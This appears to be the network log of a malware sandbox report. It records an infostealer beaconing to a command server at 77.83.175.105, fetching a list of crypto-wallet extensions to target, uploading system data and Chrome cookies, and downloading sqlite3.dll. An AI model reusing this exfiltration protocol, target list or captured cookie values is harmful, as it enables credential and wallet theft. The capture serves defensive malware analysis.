                                                                                                                                                                                                                                                                                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.104387999 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                                                                                                Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.104401112 CET1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                                                                                                                Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.105516911 CET1236INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                                                                                                                                                                                                                                                                Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.105529070 CET1236INData Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58
                                                                                                                                                                                                                                                                                                                                Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.106792927 CET1164INData Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57
                                                                                                                                                                                                                                                                                                                                Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.107999086 CET468OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHC
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="message"fplugins------BKEBFHIJECFIDGDGCGHC--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.350059032 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:02 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 108
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                                                                                                Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.383727074 CET201OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDG
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 6919
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.383770943 CET6919OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.690224886 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:02 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.915422916 CET92OUTGET /4db719b1f2f948b0/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:03.155761957 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:03 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "10e436-5e7eeebed8d80"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 1106998
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:03.156050920 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:03.156064034 CET1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                                                                                                                                                                                                                Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:03.157229900 CET1236INData Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                1192.168.2.54973377.83.175.105803552C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.605175018 CET200OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFB
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 991
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.605271101 CET991OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.826085091 CET1191OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFB
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 991
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOlt7Im5hbWUiOiJOSUQiLCJ2YWx1ZSI6IjUxOD1ZZXFFZG9EZXhNc1I1a3dEYVFQRm1RcENSVXRVOHRGVF9ScHM0b2FOMmtMeXJGMFdMTFV2T1BMZzZzQS02UkhiblZQTklidFJZX04xZFphMDk1Rjl4REt3N04xNXJhc3NkNS1PM2s4LThCMnpiTWdtUXBJazNPNmdhRno4ckZMdWNrQjd1a3k5cm1sbDRFY2J1SWZqbWliMlVQU3hoVW5uc0o3Qk5SRV9KeXNwbkItbmNBIiwiZG9tYWluIjoiLmdvb2dsZS5jb20iLCJwYXRoIjoiLyIsImV4cGlyZXMiOjE3NDU5NjA1MzQuOTEzNDI4LCJzaXplIjoxODUsImh0dHBPbmx5Ijp0cnVlLCJzZWN1cmUiOnRydWUsInNlc3Npb24iOmZhbHNlLCJzYW1lU2l0ZSI6Ik5vbmUiLCJwcmlvcml0eSI6Ik1lZGl1bSIsInNhbWVQYXJ0eSI6ZmFsc2UsInNvdXJjZVNjaGVtZSI6IlNlY3VyZSIsInNvdXJjZVBvcnQiOjQ0M31dfX0=------GCBKFBFCGIEHIDGCFBFB--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.437511921 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:17 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.601672888 CET563OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJ
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="file"------KJEHDHIEGIIIDHIDHDHJ--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.043395042 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:17 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                2192.168.2.54979677.83.175.105803552C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.118213892 CET201OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEH
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 3087
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.118556976 CET3087OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.973434925 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:26 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
